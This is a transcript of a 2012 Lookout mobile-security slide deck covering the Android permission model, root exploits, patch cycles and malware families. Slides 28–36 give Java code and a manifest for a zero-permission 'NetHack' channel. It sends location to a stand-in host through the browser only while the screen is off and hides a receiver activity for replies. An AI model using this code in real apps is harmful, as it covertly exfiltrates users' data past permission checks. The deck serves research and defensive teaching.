Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions...
-
Upload
randell-byrd -
Category
Documents
-
view
221 -
download
2
Transcript of Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions...
![Page 1: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/1.jpg)
Mobile Security Overview23 April 2012
![Page 2: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/2.jpg)
Agenda
‣ Mobile threat landscape‣ Security/permissions model & the
mythical sandbox‣ Vulnerabilities‣ Android platform patchcycle‣ Mobile malware‣ Mobile malware analysis tools
Lookout, Inc. Proprietary and Confidential Information
![Page 3: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/3.jpg)
Mobile Threat Landscape
Lookout, Inc. Proprietary and Confidential Information
![Page 4: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/4.jpg)
Mobile Threat Surface
Lookout, Inc. Proprietary and Confidential Information
Network-based
Application-based
Web-based
![Page 5: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/5.jpg)
Malware Motivations
‣ Toll fraud:
‣ Phones are a wallet of sorts
‣ Premium SMS
‣ Premium rate international dialing
Lookout, Inc. Proprietary and Confidential Information
![Page 6: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/6.jpg)
Malware Motivations
‣ Shady distribution:
‣ Bundling package push with popular apps
‣ Ranges from annoying to forced installation
Lookout, Inc. Proprietary and Confidential Information
![Page 7: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/7.jpg)
Malware Motivations
‣ Remote control:
‣ Two-factor auth MiTM
‣ Spam (SMS, etc)
‣ Targeted surveillance
Lookout, Inc. Proprietary and Confidential Information
![Page 8: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/8.jpg)
App Repackaging
Lookout, Inc. Proprietary and Confidential Information
![Page 9: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/9.jpg)
Malvertising
Lookout, Inc. Proprietary and Confidential Information
![Page 10: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/10.jpg)
Android Internals
Lookout, Inc. Proprietary and Confidential Information
![Page 11: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/11.jpg)
Android Manifest
• AndroidManifest.xml – Every application must have one
• Declares the package name, a unique identifier for every app
• Describes applications components (Activities, Services, BroadcastReceivers, etc)
• Declares requested permissions “needed” to access protected API’s (If only there were a way to get around that...)
• Declares permissions other applications are required to have to interact with applications components
Lookout, Inc. Proprietary and Confidential Information
![Page 12: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/12.jpg)
Activity
• A way for users to interact with the application
• Composed of Views:
• Button• TextView• ImageView• etc...
Lookout, Inc. Proprietary and Confidential Information
![Page 13: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/13.jpg)
Activity
•Managed as an Activity stack
•New/foreground activity on top of stack. In running/active state
•Previous Activities below in paused state
•Removed from stack when Activity finishes
Lookout, Inc. Proprietary and Confidential Information
![Page 14: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/14.jpg)
Activity
• An application can start another application’s Activity!
• Activity runs in its application’s process.
• Callee doesn’t necessarily have access to Activity’s data
• Permission attribute in manifest can restrict who can start the Activity.
Lookout, Inc. Proprietary and Confidential Information
![Page 15: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/15.jpg)
Intent
• “An abstract description of an operation to be performed”
• Simple IPC for applications
• Intents can be sent with data
Lookout, Inc. Proprietary and Confidential Information
![Page 16: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/16.jpg)
Intent
• Can be used to start an Activity with startActivity()
• Intents can be broadcast system wide with sendBroadcast()
• Communicate with a background Service
• Two main components:
• Action• Data (URI: http:, content:, geo:, etc...)
Intent myIntent = new Intent(Intent.ACTION_VIEW, Uri.parse("http://www.google.com")); startActivity(myIntent);Intent myIntent = new Intent(Intent.ACTION_VIEW, Uri.parse("http://www.google.com")); startActivity(myIntent);
Lookout, Inc. Proprietary and Confidential Information
![Page 17: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/17.jpg)
Broadcast Receiver
• Receives an Intent
• Can be created dynamically with registerBroadcast() or declared in the manifest with the <receiver> tag
• Receives two types of broadcasts:
• Normal Broadcasts – Asynchronous; Cannot be aborted
• Ordered Broadcasts – Delivered serially; Can be aborted or pass result to next receiver
Lookout, Inc. Proprietary and Confidential Information
![Page 18: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/18.jpg)
Broadcast Receiver
• Permissions can be enforced
• Sender can declare permission for who can receive the Intent
• Receiver can declare permissionfor who can send an Intent to it
Lookout, Inc. Proprietary and Confidential Information
![Page 19: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/19.jpg)
Service
• Component to do work in the background
• NOT a separate process
• NOT a thread
• Kind of like an Activity without a UI
• Can enforce access to service with a required permission
Lookout, Inc. Proprietary and Confidential Information
![Page 20: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/20.jpg)
Security/Permission ModelThe Mythical Sandbox
Lookout, Inc. Proprietary and Confidential Information
![Page 21: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/21.jpg)
The Sandbox
• The VM is not the sandbox• Unix multi-user (uid/gid) sandbox!• Each app is a different uid
• Lightweight VM running for each process
• Breaking out of the VM gains you nothing
• Apps can request to share a uid (Both must be signed with the same key)
Lookout, Inc. Proprietary and Confidential Information
![Page 22: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/22.jpg)
Permissions
• Default application has no permissions granted
• Finer grained access to content/APIs• android.permission.READ_SMS• android.permission.CHANGE_WIFI_ST
ATE• etc..
• Declared in AndroidManifest.xml
Lookout, Inc. Proprietary and Confidential Information
![Page 23: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/23.jpg)
Permissions
• Some permissions are fairly coarse
• IMEI, IMSI, MSISDN/Phone #
• Finer grained access to content/APIs• android.permission.SEND_SMS• android.permission.READ_SMS• android.permission.CHANGE_WIFI_ST
ATE• etc..
• Declared in AndroidManifest.xml
Lookout, Inc. Proprietary and Confidential Information
![Page 24: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/24.jpg)
Why permissions matter
• Permissions gate what an App can do
• Users are required to OK permissions before downloading an App
• Users can decipher to some degree whether permissions are appropriate
Lookout, Inc. Proprietary and Confidential Information
![Page 25: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/25.jpg)
Why permissions matter
VS
Lookout, Inc. Proprietary and Confidential Information
![Page 26: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/26.jpg)
What does 0 permissions mean?
• No permission screen at all!
• Straight to download
• Why should a user worry about an App Android doesn’t warn about?
Lookout, Inc. Proprietary and Confidential Information
![Page 27: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/27.jpg)
Why ask for permission when you can ask for forgiveness?
Lookout, Inc. Proprietary and Confidential Information
![Page 28: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/28.jpg)
• Apps or games not requesting INTERNET seem low risk.
• Your sandbox can’t access the internet.
• Ask your neighbor!
• Pop open a browser.
NetHack
startActivity(new Intent(Intent.ACTION_VIEW, Uri.parse("http://mysite.com/data?lat=" + lat + "&lon=" + lon)));startActivity(new Intent(Intent.ACTION_VIEW, Uri.parse("http://mysite.com/data?lat=" + lat + "&lon=" + lon)));
0 Perm UPLOAD
Lookout, Inc. Proprietary and Confidential Information
![Page 29: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/29.jpg)
• Can we do this secretly?
• Obscuring browser (onPause()) stops page from loading.
32.175.xxx.xxx - - [03:30:36] "GET /data?lat=123.2&lon=32.2 HTTP/1.1" 404 20332.175.xxx.xxx - - [03:30:36] "GET /data?lat=123.2&lon=32.2 HTTP/1.1" 404 203
0 Perm UPLOAD
Lookout, Inc. Proprietary and Confidential Information
![Page 30: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/30.jpg)
• How about we only pop up browsers when the screen is off?
• Need to close browser when the screen turns on
• Bonus Points: Redirect to http://www.google.com when you’re done (or read browser history from logs)
0 Perm UPLOAD
Lookout, Inc. Proprietary and Confidential Information
![Page 31: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/31.jpg)
// Lets send if no one is looking! PowerManager pm = (PowerManager) getSystemService(Context.POWER_SERVICE); if (!pm.isScreenOn()) { Log.e("NetHack", "Screen off"); startActivity(new Intent(Intent.ACTION_VIEW, Uri.parse("http://mysite/data?lat=" + lat + "&lon=" + lon)).setFlags (Intent.FLAG_ACTIVITY_NEW_TASK)); mBrowserDisplayed = true; } else if (mBrowserDisplayed) { Log.e("NetHack", "Screen on"); startActivity(new Intent(Intent.ACTION_MAIN).addCategory (Intent.CATEGORY_HOME)); mBrowserDisplayed = false; }
// Lets send if no one is looking! PowerManager pm = (PowerManager) getSystemService(Context.POWER_SERVICE); if (!pm.isScreenOn()) { Log.e("NetHack", "Screen off"); startActivity(new Intent(Intent.ACTION_VIEW, Uri.parse("http://mysite/data?lat=" + lat + "&lon=" + lon)).setFlags (Intent.FLAG_ACTIVITY_NEW_TASK)); mBrowserDisplayed = true; } else if (mBrowserDisplayed) { Log.e("NetHack", "Screen on"); startActivity(new Intent(Intent.ACTION_MAIN).addCategory (Intent.CATEGORY_HOME)); mBrowserDisplayed = false; }
But what about two way communication?
0 Perm UPLOAD
Lookout, Inc. Proprietary and Confidential Information
![Page 32: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/32.jpg)
0 Perm Bidirectional
•Pop browser to page with downloadable content-type (http://mysite.com/data.zip)
•Default Android browser automatically saves it to /sdcard/downloads/data.zip
•But there are some downsides...
Lookout, Inc. Proprietary and Confidential Information
![Page 33: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/33.jpg)
•No way to clear notifications
• To clean up the filesystem you need to request WRITE_EXTERNAL_STORAGE
• Automatically requested if you target Android 1.5
0 Perm Bidirectional
Lookout, Inc. Proprietary and Confidential Information
![Page 34: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/34.jpg)
•How about a custom URI receiver?
•Google Maps uses geo:latitude,longitude?zoom to automatically launch their App
•We can do the same!
0 Perm Bidirectional
Lookout, Inc. Proprietary and Confidential Information
![Page 35: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/35.jpg)
• We can register ourselves for nethack://
• Redirect our page from before to nethack:data?param=server_data
• This has to be an <activity>, not a <receiver> (It is meant for foreground interactions)
<!-- AndroidManifest.xml --><activity android:name=".NetHackReceiver">
<intent-filter><action
android:name="android.intent.action.VIEW"/><category
android:name="android.intent.category.DEFAULT"/><category
android:name="android.intent.category.BROWSABLE"/><data android:scheme="nethack" android:host="data"/>
</intent-filter></activity>
<!-- AndroidManifest.xml --><activity android:name=".NetHackReceiver">
<intent-filter><action
android:name="android.intent.action.VIEW"/><category
android:name="android.intent.category.DEFAULT"/><category
android:name="android.intent.category.BROWSABLE"/><data android:scheme="nethack" android:host="data"/>
</intent-filter></activity>
0 Perm Bidirectional
Lookout, Inc. Proprietary and Confidential Information
![Page 36: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/36.jpg)
• Activity is never seen if you call finish() in onCreate()
• Data is available in the Intent
• Bonus Points: New tab for nethack URI and redirect original page to http://google.com
public class NetHackReceiver extends Activity { @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); Log.e("NetHack", "URI: " + getIntent().toURI()); finish(); // So no one ever sees this activity }}
public class NetHackReceiver extends Activity { @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); Log.e("NetHack", "URI: " + getIntent().toURI()); finish(); // So no one ever sees this activity }}
E/NetHack ( 8647): URI: nethack:data?param=MySecret#Intent;action=android.intent.action.VIEW;category=android.intent.category.BROWSABLE;launchFlags=0x400000;component=com.lookout.nethack/.NetHack;end
E/NetHack ( 8647): URI: nethack:data?param=MySecret#Intent;action=android.intent.action.VIEW;category=android.intent.category.BROWSABLE;launchFlags=0x400000;component=com.lookout.nethack/.NetHack;end
0 Perm Bidirectional
Lookout, Inc. Proprietary and Confidential Information
![Page 37: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/37.jpg)
Vulnerabilities
Lookout, Inc. Proprietary and Confidential Information
![Page 38: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/38.jpg)
System Privilege Escalations
•Software has vulns. We expect this.
•Malware has primarily relied on 3 prominent privilege escalations.
•Slow (or non-existent) patch cycles leave a long tail of impact
•Also, lots of old things are new …
Lookout, Inc. Proprietary and Confidential Information
![Page 39: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/39.jpg)
Exploid
•Disclosed: 2010-07-15
•Unchecked origin of uevent messages in init.
•Patch - 2.2: 2010-07-19
Lookout, Inc. Proprietary and Confidential Information
![Page 40: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/40.jpg)
RATC/Zimperlich
•Disclosed: 2010-08-21/ 2010-12-30
•Unchecked setuid() return value in adb/zygote
•Patch - 2.3: 2010-08-27 / 2010-08-30
•Backport - 2.2: 2010-08-30
Lookout, Inc. Proprietary and Confidential Information
![Page 41: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/41.jpg)
Gingerbreak/Honeybomb
•Disclosed: 2011-04-21
•Vold uevent origin bug + arbitrary offset 4byte write
•Patch - 2.3: 2011-04-18
•Backport - 2.2: 2011-04-26
Lookout, Inc. Proprietary and Confidential Information
![Page 42: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/42.jpg)
And many more …
• Many are hardware/OEM-specific
• Many OEM utilities are not coded securely
• Sometimes it feels like reading bugtraq circa 1995
• Vulns are often reserved for rooting devices
• We have yet to see malicious use of a remote, but it will happen
Lookout, Inc. Proprietary and Confidential Information
![Page 43: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/43.jpg)
On Lockdown
•Devices ship with firmware locked down
•Motivations: Radio Security, DRM
•This prevents enthusiast modification of the OS image
Lookout, Inc. Proprietary and Confidential Information
![Page 44: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/44.jpg)
Jailbreaking
•Enthusiasts are undeterred
•Exploits have generally been published to jailbreak devices
•Unfortunately they’re also used by malware authors
•In many cases vendors are notified, but not always
•Net impact is negative for handset security
Lookout, Inc. Proprietary and Confidential Information
![Page 45: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/45.jpg)
App Vulns
• What about user-level applications?
• Entry points (Activities, Receivers, Services, Providers) can expose unsafe behaviors leading to compromised authorization
• Eg. Process execution
• Again, everything old is new …
• Eg. Process umask (022 vs 000)
Lookout, Inc. Proprietary and Confidential Information
![Page 46: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/46.jpg)
Android Platform Patch Cycle
Lookout, Inc. Proprietary and Confidential Information
![Page 47: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/47.jpg)
Platform – OSS Libs
Lookout, Inc. Proprietary and Confidential Information
• Android devices are complex software systems• Over 115 OSS libs integrated into AOSP
![Page 48: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/48.jpg)
Platform – Native Code
Lookout, Inc. Proprietary and Confidential Information
• Over 60% of code is native
![Page 49: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/49.jpg)
Platform Ecosystem
Lookout, Inc. Proprietary and Confidential Information
![Page 50: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/50.jpg)
Compatibility Test Suite (CTS)
Lookout, Inc. Proprietary and Confidential Information
‣Prior to releasing any update the CTS must be passing in order to remain Android Compatible
‣Originally to prevent breaking compatibility w/ 3rd party apps
‣Now security based tests for vulnerabilities and bad practices‣ Checks for setuid apps, public keys, known
vulns, etc.
![Page 51: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/51.jpg)
Android Release Family
Lookout, Inc. Proprietary and Confidential Information
![Page 52: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/52.jpg)
Good Release Cycle – Google Nexus One
Lookout, Inc. Proprietary and Confidential Information
‣Devices have patches rolled out to them consistently
‣Not just major releases – also incremental updates
![Page 53: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/53.jpg)
Bad Release Cycle – Huawei ‘Ascend’
Lookout, Inc. Proprietary and Confidential Information
‣Something’s wrong here…
![Page 54: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/54.jpg)
Mobile Malware
Lookout, Inc. Proprietary and Confidential Information
![Page 55: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/55.jpg)
DroidDream
• Publicly disclosed March 1st, 2011
• 250k devices affected from the Market
• DDLight is related but doesn’t escalate privs.
• Attempts to use either exploid or RAtC to root device, leaves su shim behind to regain access
• Remounts /system and pushes apks to /system/app
Lookout, Inc. Proprietary and Confidential Information
![Page 56: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/56.jpg)
BaseBridge
• Publicly disclosed March 17th, 2011
• Over 10 unique variants detected
• Attempts to use RAtC to root device
• Remounts /system and pushes apks to /system/app
Lookout, Inc. Proprietary and Confidential Information
![Page 57: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/57.jpg)
zHash
• Publicly disclosed March 20th, 2011
• 3 unique variants detected
• Attempts to use Exploid to root device, leaves a su shim behind as /system/bin/extend
• Changes secure settings for possible development reasons
Lookout, Inc. Proprietary and Confidential Information
![Page 58: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/58.jpg)
Legacy / DroidKungFu / DroidKungFu2
• Publicly disclosed April 4th, 2011
• Attempts to use Exploid and RAtC to root device
• Remounts /system and pushes an apk to /system/app
Lookout, Inc. Proprietary and Confidential Information
![Page 59: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/59.jpg)
jSMSHider
• Publicly disclosed June 15th, 2011
• Exploits compromised platform key vulnerability
• Can silently download/install w/o user intervention
Lookout, Inc. Proprietary and Confidential Information
![Page 60: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/60.jpg)
RootSmart
• Publicly disclosed February 2012
• Masquerades as settings app
• Downloads and executes Gingerbreak
• Dropper for DroidLive
Lookout, Inc. Proprietary and Confidential Information
![Page 61: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/61.jpg)
LeNa
• Publicly disclosed October 20, 2011
• Packaged with apps that conceivably need root (VPN, etc)
• Payload is primarily native ARM
• Variant uncovered April 2012 that hide Gingerbreak inside a fully functional JPEG
Lookout, Inc. Proprietary and Confidential Information
